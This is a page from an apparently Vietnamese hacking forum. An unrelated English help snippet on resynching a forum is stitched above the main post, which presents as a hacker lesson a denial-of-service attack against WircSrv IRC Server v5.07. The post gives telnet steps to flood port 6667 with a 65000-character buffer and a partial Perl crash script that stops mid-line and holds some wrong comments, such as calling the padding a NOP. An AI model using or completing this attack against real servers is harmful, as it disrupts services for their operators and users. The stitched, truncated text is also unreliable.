TW.White
Celebrate a good day let us forum TW.White City
Resynching Your Forum


If your forum is undergoing a very minor issue that you can't cope with, then try resynching the forum. Resynching your forum will not hurt it, but it will help fix the small bugs and ticked settings for your forum. So, it won't hurt to give it a shot.
To resynchronize your forum:
  1. Head off to your Administration Panel, and then click the General tab. (Be sure that you have the Admin Panel set in Advanced Mode.)
    Spoiler:


  2. Forum -> 'Configuration' section
    Spoiler:


  3. Now that you are on the Configuration page, scroll all the way down the page until you see the Misc options* table. You'll then see at the bottom that you are able to resyncronize your forum. Tick the option box to do so, and then click Save.
    Spoiler:


Now, if that doesn't fix up your minor issue in your forum, then your best condolences would to answer your question in the

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

View previous topic View next topic Go down

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

Post by TW.White City on Tue May 17, 2016 7:57 pm

42 . )  Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : 
 
 
WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667. 
 Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667: 
 
 
 Nếu bạn dùng Unix: 
 
 [hellme@die-communitech.net$ telnet irc.example.com 6667 
 Trying example.com... 
 Connected to example.com. 
 Escape character is `^]`. 
 [buffer] 
 
 Windows cũng tương tự: 
 
 telnet irc.example.com 6667 
 
 Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự . 
 Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ): 
 
 CODE 


Code:
 #!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl 
 use Getopt::Std; 
 use Socket; 
 getopts(`s:`, \%args); 
 if(!defined($args{s})){&usage;} 
 my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto); 
 $foo = ``A``; # Đây là NOP 
 $number = ``65000``; # Đây là tất cả số NOP 
 $data .= $foo x $number; # kết quả của $foo times $number 
 $serv = $args{s}; # lệnh điều khiển server từ xa 
 $port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667 
 $buf = ``$data``; 
 $in_addr = (gethostbyname($serv))[4]


Theo HVA

_________________
TW.White City
avatar
TW.White City
Newbie 4
Newbie 4

Messages : 51

Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum
Share this topic...
Link this topic
URL:
BBCode:
HTML: